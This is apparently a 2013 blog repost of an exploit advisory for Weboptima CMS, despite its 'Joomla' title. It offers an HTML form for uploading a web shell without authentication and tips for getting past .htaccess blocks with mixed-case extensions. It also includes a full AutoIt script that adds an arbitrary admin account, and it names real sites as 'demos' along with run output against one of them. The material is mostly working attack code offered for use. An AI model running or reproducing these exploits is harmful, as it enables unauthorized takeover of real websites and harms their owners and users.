Friday 19 April 2013

Joomla (webotima shell upload vuln)

Posted on 10:37 by Eagle Eye

#cs
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm AkaStep member from Inj3ct0r Team                  1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

weboptima_cms_remote_add_admin_shell_upload.au3
Video: http://www.youtube.com/watch?v=2Cm9hNR3dNc&feature=youtu.be
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both Exploits are available(HTML exploit to upload shell)
And Autoit Exploit to add arbitrary admin accounts to target site.
More detailts below.
============================================

Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/

============================================
About Vulns:

1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.
Vulnerable code:

//cms/upload.php
=============SNIP BEGINS======================
<?php
  $path="../uploades";
if(!file_exists($path))
{
mkdir($path, 0777);
}

if(isset($_GET['name']))
{
unlink($path."/".$_GET['name']);
$letter = $_GET['letter'];
$selTypey = $_GET['selType'];
header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
    <div align="center">
    <table align="center">
    <tr>
        <td colspan="3" align="center"><span class="title">ФїЦЃХѕХЎХ® Ц†ХЎХµХ¬ХҐЦЂ</span></td>
        </tr>
        <tr>
<td>
<?php
if(isset($_POST['sub']))
{
$fileName = $_FILES["up_file"]['name'];
$masSimbl = array('&','%','#');
if(in_array($fileName[0], $masSimbl))
{
echo $fileName[0].' ХЅХ«ХґХѕХёХ¬ХёХѕ ХЅХЇХЅХѕХёХІ ХЎХ¶ХёЦ‚Х¶ Х№ХЁХ¶ХїЦЂХҐХ¬';
}
else
{
move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
}
}
?>
========================SNIP ENDS=================




Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file"   name="up_file" />&nbsp;&nbsp;<input type="submit" class="button" name="sub" value="send"></form>

After Successfully shell upload your shell can be found: http://site.tld/uploades/shellname.php

NOTE: There may be simple .htaccess to prevent you from accessing shell(HTTP 403).
This is not problem just upload your shell like:

myshell.PhP
or
myshell.pHp

OWNED.



2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.
Vulnerable Code:
//cms/loginPass.php
Notice: header() without exit;*Script continues it's execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop") {
header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");

$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is exploit written in Autoit to exploit
this vulnerability and add admin to target site.


Exploit usage(CLI):

weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere


##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld  username  password
[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]
[@@@]           Vuln & Exploit By AkaStep               [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]

##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################

##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################

##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0

##################################################
[*] Yaaaaa We are Going To Travel xD           [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
   OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################


#ce
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF  & _
'Usage: ' & @ScriptName &  ' http://site.tld ' & ' username  ' & 'password ' & _
@CRLF & "[*]      DON'T HATE THE HACKER, HATE YOUR OWN CODE!      [*]" & @CRLF & _
'[@@@]           Vuln & Exploit By AkaStep               [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if  $CmdLine[0] <> 3 Then
MsgBox(64,"",$msg_usage);
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
exit;
EndIf


if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$username=$CmdLine[2];
$password=$CmdLine[3];
EndIf



if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
ConsoleWrite('Are you kidding me?');
Exit;
EndIf


HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
Exit;
EndIf


ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));



HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);




if StringInStr($sidentify,$cmsindent) Then
ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
$error+=1;
EndIf




$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')


priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)


$count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;


Global $sAddress = $targetsite

$triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
$whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF &  'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
$username & @CRLF & 'With Password: ' & $password &  $triptrop;
if $count <=1 then ConsoleWrite($whatcurrentlywedo)

$doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
ConsoleWrite($doitnicely);
Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";


if $error>=2 OR $count>=2 Then
ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)

if int($error)=0 then
ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD           [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: '  & _
$username & @CRLF & 'With Password: ' & $password & @CRLF & _
'*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
'   OTHERWISE YOU WILL UNABLE TO LOGIN!   ' & $triptrop & '[*] Exit [*]' & $triptrop);
exit;
Else

ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed?   [*]' & @CRLF & _
'[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
'[*]  May be you are Lucky;)                   [*]' & _
@CRLF & 'Try to login @ '  & @CRLF  & _
'Site: ' & $targetsite & $adminpanel & @CRLF & _
'With Username: '  & $username & @CRLF & 'With Password: ' & $password &  $triptrop & '[*] Exit [*]' & $triptrop);

EndIf
exit;

EndIf



Global $hOpen = _WinHttpOpen($useragent);
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
_WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
_WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
_WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)

Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
    $sHeader = _WinHttpQueryHeaders($hRequest)
    Do
        $sReturned &= _WinHttpReadData($hRequest)
    Until @error

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;

Else
$error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;

_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)

$targetsite=StringMid($targetsite,5,StringLen($targetsite))
Sleep(Random(10000,20000,1));
priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#

EndIf

EndFunc;=> priv8();


#cs
Categories:

0 comments:

Post a Comment